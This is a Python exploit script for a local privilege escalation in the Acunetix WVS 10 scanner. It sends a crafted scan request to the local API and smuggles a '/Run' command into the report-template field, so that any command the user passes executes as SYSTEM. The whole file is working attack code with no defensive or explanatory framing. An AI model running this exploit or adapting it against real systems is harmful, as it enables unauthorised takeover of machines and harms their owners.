import http.client
import json
import os
import sys
from datetime import datetime
from pprint import pprint as print

url = "/api/addScan"
if len(sys.argv) > 1:
    COMMAND = sys.argv[1]
else:
    print('请输入想要执行的命令参数: python xx.py "command"')
    os._exit(0)

ACUHOST = "127.0.0.1"
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true",
}
ACUEXPLOIT = '/Crawl http://www.google.it /Run "' + COMMAND + '"'
ACUDATA = {
    "scanType": "scan",
    "targetList": "",
    # "target": ["http://" + "A" * 2048],
    "target": ["http://" + "A" * 20],
    "recurse": "-1",
    "date": datetime.now().strftime("%m/%d/%Y"),  # '05/23/2024'
    "dayOfWeek": "1",
    "dayOfMonth": "1",
    "time": "%s:%s" % (datetime.now().hour, datetime.now().minute + 1),  # 12:21
    "deleteAfterCompletion": "False",
    "params": {
        "profile": "Default",
        "loginSeq": "<none>",
        "settings": "Default",
        "scanningmode": "heuristic",
        "excludedhours": "<none>",
        "savetodatabase": "True",
        "savelogs": "False",
        "generatereport": "False",
        "reportformat": "PDF",
        "reporttemplate": "WVSDeveloperReport.rep " + ACUEXPLOIT,
        "emailaddress": "",
    },
}


def sendExploit():
    conn = http.client.HTTPConnection(ACUHOST, ACUPORT)
    body = json.dumps(ACUDATA)
    conn.request("POST", url, body=body, headers=ACUHEADERS)
    resp = conn.getresponse()
    print(f"{resp.status=}, {resp.reason=}, resp body={resp.read().decode()}")


if __name__ == "__main__":
    print("[+] Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n")
    print("[+] Command : %s will be executed as SYSTEM" % COMMAND)
    print("[+] Sending exploit...")
    sendExploit()
    print("[+] Done!")
